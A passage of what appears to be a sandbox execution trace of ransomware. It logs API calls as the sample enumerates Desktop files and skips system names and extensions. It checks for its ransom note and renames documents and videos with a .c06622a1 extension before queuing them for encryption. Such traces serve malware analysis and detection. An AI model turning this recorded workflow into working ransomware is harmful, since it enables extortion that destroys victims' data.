_Str2="5zWh464.avi") returned 57 [0155.833] wcslen (_String="ntuser.dat") returned 0xa [0155.834] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5zWh464.avi") returned 57 [0155.834] wcslen (_String="ntuser.dat.log") returned 0xe [0155.834] _wcsicmp (_Str1="ntuser.ini", _Str2="5zWh464.avi") returned 57 [0155.834] wcslen (_String="ntuser.ini") returned 0xa [0155.834] _wcsicmp (_Str1="thumbs.db", _Str2="5zWh464.avi") returned 63 [0155.834] wcslen (_String="thumbs.db") returned 0x9 [0155.834] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0155.834] wcslen (_String="386") returned 0x3 [0155.834] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0155.834] wcslen (_String="adv") returned 0x3 [0155.834] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0155.834] wcslen (_String="ani") returned 0x3 [0155.834] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0155.834] wcslen (_String="bat") returned 0x3 [0155.834] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0155.834] wcslen (_String="bin") returned 0x3 [0155.834] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0155.834] wcslen (_String="cab") returned 0x3 [0155.834] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0155.834] wcslen (_String="cmd") returned 0x3 [0155.834] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0155.834] wcslen (_String="com") returned 0x3 [0155.834] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0155.834] wcslen (_String="cpl") returned 0x3 [0155.834] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0155.834] wcslen (_String="cur") returned 0x3 [0155.834] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0155.834] wcslen (_String="deskthemepack") returned 0xd [0155.834] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0155.834] wcslen (_String="diagcab") returned 0x7 [0155.834] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0155.834] wcslen (_String="diagcfg") returned 0x7 [0155.834] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0155.834] wcslen (_String="diagpkg") returned 0x7 [0155.834] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0155.835] wcslen (_String="dll") returned 0x3 [0155.835] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0155.835] wcslen (_String="drv") returned 0x3 [0155.835] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0155.835] wcslen (_String="exe") returned 0x3 [0155.835] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0155.835] wcslen (_String="hlp") returned 0x3 [0155.835] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0155.835] wcslen (_String="icl") returned 0x3 [0155.835] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0155.835] wcslen (_String="icns") returned 0x4 [0155.835] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0155.835] wcslen (_String="ico") returned 0x3 [0155.835] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0155.835] wcslen (_String="ics") returned 0x3 [0155.835] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0155.835] wcslen (_String="idx") returned 0x3 [0155.835] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0155.835] wcslen (_String="ldf") returned 0x3 [0155.835] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0155.835] wcslen (_String="lnk") returned 0x3 [0155.835] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0155.835] wcslen (_String="mod") returned 0x3 [0155.835] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0155.835] wcslen (_String="mpa") returned 0x3 [0155.835] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0155.835] wcslen (_String="msc") returned 0x3 [0155.835] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0155.835] wcslen (_String="msp") returned 0x3 [0155.835] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0155.835] wcslen (_String="msstyles") returned 0x8 [0155.836] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0155.836] wcslen (_String="msu") returned 0x3 [0155.836] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0155.836] wcslen (_String="nls") returned 0x3 [0155.836] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0155.836] wcslen (_String="nomedia") returned 0x7 [0155.836] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0155.836] wcslen (_String="ocx") returned 0x3 [0155.836] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0155.836] wcslen (_String="prf") returned 0x3 [0155.836] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0155.836] wcslen (_String="ps1") returned 0x3 [0155.836] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0155.836] wcslen (_String="rom") returned 0x3 [0155.836] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0155.836] wcslen (_String="rtp") returned 0x3 [0155.836] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0155.836] wcslen (_String="scr") returned 0x3 [0155.836] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0155.836] wcslen (_String="shs") returned 0x3 [0155.836] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0155.836] wcslen (_String="spl") returned 0x3 [0155.836] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0155.836] wcslen (_String="sys") returned 0x3 [0155.836] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0155.836] wcslen (_String="theme") returned 0x5 [0155.836] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0155.836] wcslen (_String="themepack") returned 0x9 [0155.836] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0155.836] wcslen (_String="wpx") returned 0x3 [0155.836] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0155.836] wcslen (_String="lock") returned 0x4 [0155.836] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0155.836] wcslen (_String="key") returned 0x3 [0155.836] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0155.837] wcslen (_String="hta") returned 0x3 [0155.837] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0155.837] wcslen (_String="msi") returned 0x3 [0155.837] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0155.837] wcslen (_String="pdb") returned 0x3 [0155.837] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0155.837] wcslen (_String="sqlite") returned 0x6 [0155.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.837] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.837] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.837] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.837] wcscpy (in: _Dest=0x208e74, _Source="5zWh464.avi" | out: _Dest="5zWh464.avi") returned="5zWh464.avi" [0155.837] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi", dwFileAttributes=0x80) returned 1 [0155.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5zwh464.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0155.837] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.838] ReadFile (in: hFile=0x1d0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.838] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x8c7ebfa1 [0155.838] RtlComputeCrc32 (PartialCrc=0xbfa1, Buffer=0x32ec24, Length=0x80) returned 0x14679601 [0155.838] RtlComputeCrc32 (PartialCrc=0x9601, Buffer=0x32ec24, Length=0x80) returned 0xbca5534e [0155.838] RtlComputeCrc32 (PartialCrc=0x534e, Buffer=0x32ec24, Length=0x80) returned 0x542b9b39 [0155.838] RtlComputeCrc32 (PartialCrc=0x9b39, Buffer=0x32ec24, Length=0x80) returned 0xcf3916e8 [0155.838] CloseHandle (hObject=0x1d0) returned 1 [0155.839] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.839] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi" [0155.839] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi") returned 0x35 [0155.839] wcscpy (in: _Dest=0x218e92, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.839] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5zwh464.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5zwh464.avi.c06622a1"), dwFlags=0x8) returned 1 [0155.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5zWh464.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5zwh464.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0155.841] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.841] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42564427 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x657c0b [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b00d570 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ee967b6 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19852ff3 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29ed15b0 [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7952e57f [0155.848] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3e00871e [0155.851] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0x4c785798 [0155.851] RtlComputeCrc32 (PartialCrc=0x5798, Buffer=0x3630094, Length=0x80) returned 0xe4aa66f5 [0155.851] RtlComputeCrc32 (PartialCrc=0x66f5, Buffer=0x3630094, Length=0x80) returned 0x31ae9201 [0155.851] RtlComputeCrc32 (PartialCrc=0x9201, Buffer=0x3630094, Length=0x80) returned 0x4126c6e9 [0155.851] RtlComputeCrc32 (PartialCrc=0xc6e9, Buffer=0x3630094, Length=0x80) returned 0x87bc0330 [0155.851] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0155.851] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.851] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.851] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b4a670, ftCreationTime.dwHighDateTime=0x1d5d946, ftLastAccessTime.dwLowDateTime=0x55b1c8b0, ftLastAccessTime.dwHighDateTime=0x1d5e6a3, ftLastWriteTime.dwLowDateTime=0x55b1c8b0, ftLastWriteTime.dwHighDateTime=0x1d5e6a3, nFileSizeHigh=0x0, nFileSizeLow=0x1098d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6r2 Xhif0e1XVd.docx", cAlternateFileName="6R2XHI~1.DOC")) returned 1 [0155.851] _wcsicmp (_Str1="6r2 Xhif0e1XVd.docx", _Str2="README.c06622a1.TXT") returned -60 [0155.851] wcsstr (_Str="6r2 Xhif0e1XVd.docx", _SubStr="README") returned 0x0 [0155.851] _wcsicmp (_Str1="autorun.inf", _Str2="6r2 Xhif0e1XVd.docx") returned 43 [0155.851] wcslen (_String="autorun.inf") returned 0xb [0155.851] _wcsicmp (_Str1="boot.ini", _Str2="6r2 Xhif0e1XVd.docx") returned 44 [0155.851] wcslen (_String="boot.ini") returned 0x8 [0155.851] _wcsicmp (_Str1="bootfont.bin", _Str2="6r2 Xhif0e1XVd.docx") returned 44 [0155.851] wcslen (_String="bootfont.bin") returned 0xc [0155.852] _wcsicmp (_Str1="bootsect.bak", _Str2="6r2 Xhif0e1XVd.docx") returned 44 [0155.852] wcslen (_String="bootsect.bak") returned 0xc [0155.852] _wcsicmp (_Str1="desktop.ini", _Str2="6r2 Xhif0e1XVd.docx") returned 46 [0155.852] wcslen (_String="desktop.ini") returned 0xb [0155.852] _wcsicmp (_Str1="iconcache.db", _Str2="6r2 Xhif0e1XVd.docx") returned 51 [0155.852] wcslen (_String="iconcache.db") returned 0xc [0155.852] _wcsicmp (_Str1="ntldr", _Str2="6r2 Xhif0e1XVd.docx") returned 56 [0155.852] wcslen (_String="ntldr") returned 0x5 [0155.852] _wcsicmp (_Str1="ntuser.dat", _Str2="6r2 Xhif0e1XVd.docx") returned 56 [0155.852] wcslen (_String="ntuser.dat") returned 0xa [0155.852] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6r2 Xhif0e1XVd.docx") returned 56 [0155.852] wcslen (_String="ntuser.dat.log") returned 0xe [0155.852] _wcsicmp (_Str1="ntuser.ini", _Str2="6r2 Xhif0e1XVd.docx") returned 56 [0155.852] wcslen (_String="ntuser.ini") returned 0xa [0155.852] _wcsicmp (_Str1="thumbs.db", _Str2="6r2 Xhif0e1XVd.docx") returned 62 [0155.852] wcslen (_String="thumbs.db") returned 0x9 [0155.852] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0155.852] wcslen (_String="386") returned 0x3 [0155.852] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0155.852] wcslen (_String="adv") returned 0x3 [0155.852] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0155.852] wcslen (_String="ani") returned 0x3 [0155.852] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0155.852] wcslen (_String="bat") returned 0x3 [0155.852] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0155.852] wcslen (_String="bin") returned 0x3 [0155.852] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0155.852] wcslen (_String="cab") returned 0x3 [0155.852] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0155.852] wcslen (_String="cmd") returned 0x3 [0155.852] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0155.852] wcslen (_String="com") returned 0x3 [0155.852] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0155.853] wcslen (_String="cpl") returned 0x3 [0155.853] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0155.853] wcslen (_String="cur") returned 0x3 [0155.853] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0155.853] wcslen (_String="deskthemepack") returned 0xd [0155.853] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0155.853] wcslen (_String="diagcab") returned 0x7 [0155.853] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0155.853] wcslen (_String="diagcfg") returned 0x7 [0155.853] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0155.853] wcslen (_String="diagpkg") returned 0x7 [0155.853] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0155.853] wcslen (_String="dll") returned 0x3 [0155.853] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0155.853] wcslen (_String="drv") returned 0x3 [0155.853] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0155.853] wcslen (_String="exe") returned 0x3 [0155.853] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0155.853] wcslen (_String="hlp") returned 0x3 [0155.853] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0155.853] wcslen (_String="icl") returned 0x3 [0155.853] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0155.853] wcslen (_String="icns") returned 0x4 [0155.853] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0155.853] wcslen (_String="ico") returned 0x3 [0155.853] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0155.853] wcslen (_String="ics") returned 0x3 [0155.853] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0155.853] wcslen (_String="idx") returned 0x3 [0155.853] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0155.853] wcslen (_String="ldf") returned 0x3 [0155.853] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0155.853] wcslen (_String="lnk") returned 0x3 [0155.853] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0155.853] wcslen (_String="mod") returned 0x3 [0155.853] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0155.853] wcslen (_String="mpa") returned 0x3 [0155.854] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0155.854] wcslen (_String="msc") returned 0x3 [0155.854] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0155.854] wcslen (_String="msp") returned 0x3 [0155.854] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0155.854] wcslen (_String="msstyles") returned 0x8 [0155.854] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0155.854] wcslen (_String="msu") returned 0x3 [0155.854] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0155.854] wcslen (_String="nls") returned 0x3 [0155.854] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0155.854] wcslen (_String="nomedia") returned 0x7 [0155.854] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0155.854] wcslen (_String="ocx") returned 0x3 [0155.854] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0155.854] wcslen (_String="prf") returned 0x3 [0155.854] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0155.854] wcslen (_String="ps1") returned 0x3 [0155.854] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0155.854] wcslen (_String="rom") returned 0x3 [0155.854] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0155.854] wcslen (_String="rtp") returned 0x3 [0155.854] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0155.854] wcslen (_String="scr") returned 0x3 [0155.854] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0155.854] wcslen (_String="shs") returned 0x3 [0155.854] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0155.854] wcslen (_String="spl") returned 0x3 [0155.854] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0155.854] wcslen (_String="sys") returned 0x3 [0155.854] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0155.854] wcslen (_String="theme") returned 0x5 [0155.854] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0155.854] wcslen (_String="themepack") returned 0x9 [0155.854] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0155.855] wcslen (_String="wpx") returned 0x3 [0155.855] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0155.855] wcslen (_String="lock") returned 0x4 [0155.855] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0155.855] wcslen (_String="key") returned 0x3 [0155.855] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0155.855] wcslen (_String="hta") returned 0x3 [0155.855] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0155.855] wcslen (_String="msi") returned 0x3 [0155.855] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0155.855] wcslen (_String="pdb") returned 0x3 [0155.855] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0155.855] wcslen (_String="sqlite") returned 0x6 [0155.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.855] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.855] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.855] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.855] wcscpy (in: _Dest=0x208e74, _Source="6r2 Xhif0e1XVd.docx" | out: _Dest="6r2 Xhif0e1XVd.docx") returned="6r2 Xhif0e1XVd.docx" [0155.855] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx", dwFileAttributes=0x80) returned 1 [0155.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6r2 xhif0e1xvd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0155.856] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.856] ReadFile (in: hFile=0x1e0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.856] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xfa65d386 [0155.856] RtlComputeCrc32 (PartialCrc=0xd386, Buffer=0x32ec24, Length=0x80) returned 0x5fb3d022 [0155.856] RtlComputeCrc32 (PartialCrc=0xd022, Buffer=0x32ec24, Length=0x80) returned 0x24c20945 [0155.856] RtlComputeCrc32 (PartialCrc=0x945, Buffer=0x32ec24, Length=0x80) returned 0xabb9ead1 [0155.857] RtlComputeCrc32 (PartialCrc=0xead1, Buffer=0x32ec24, Length=0x80) returned 0xeb63f295 [0155.857] CloseHandle (hObject=0x1e0) returned 1 [0155.857] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.857] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx" [0155.857] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx") returned 0x3d [0155.857] wcscpy (in: _Dest=0x218ea2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.857] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6r2 xhif0e1xvd.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6r2 xhif0e1xvd.docx.c06622a1"), dwFlags=0x8) returned 1 [0155.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6r2 Xhif0e1XVd.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6r2 xhif0e1xvd.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0155.860] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.860] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c33e46f [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c787f21 [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x570f4920 [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd78276 [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x346e34fe [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x666e6ac [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x750df3ee [0155.867] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x199cc71a [0155.870] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0x4d659f85 [0155.870] RtlComputeCrc32 (PartialCrc=0x9f85, Buffer=0x36c0094, Length=0x80) returned 0xa911ad50 [0155.870] RtlComputeCrc32 (PartialCrc=0xad50, Buffer=0x36c0094, Length=0x80) returned 0x5286b7fb [0155.870] RtlComputeCrc32 (PartialCrc=0xb7fb, Buffer=0x36c0094, Length=0x80) returned 0x23c0bb81 [0155.870] RtlComputeCrc32 (PartialCrc=0xbb81, Buffer=0x36c0094, Length=0x80) returned 0xf31e375c [0155.870] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0155.870] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.870] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.870] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda101140, ftCreationTime.dwHighDateTime=0x1d5dfad, ftLastAccessTime.dwLowDateTime=0x7b819360, ftLastAccessTime.dwHighDateTime=0x1d5db25, ftLastWriteTime.dwLowDateTime=0x7b819360, ftLastWriteTime.dwHighDateTime=0x1d5db25, nFileSizeHigh=0x0, nFileSizeLow=0x83c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="8TzcRc4KQBgmUVZe.avi", cAlternateFileName="8TZCRC~1.AVI")) returned 1 [0155.870] _wcsicmp (_Str1="8TzcRc4KQBgmUVZe.avi", _Str2="README.c06622a1.TXT") returned -58 [0155.870] wcsstr (_Str="8TzcRc4KQBgmUVZe.avi", _SubStr="README") returned 0x0 [0155.870] _wcsicmp (_Str1="autorun.inf", _Str2="8TzcRc4KQBgmUVZe.avi") returned 41 [0155.870] wcslen (_String="autorun.inf") returned 0xb [0155.870] _wcsicmp (_Str1="boot.ini", _Str2="8TzcRc4KQBgmUVZe.avi") returned 42 [0155.871] wcslen (_String="boot.ini") returned 0x8 [0155.871] _wcsicmp (_Str1="bootfont.bin", 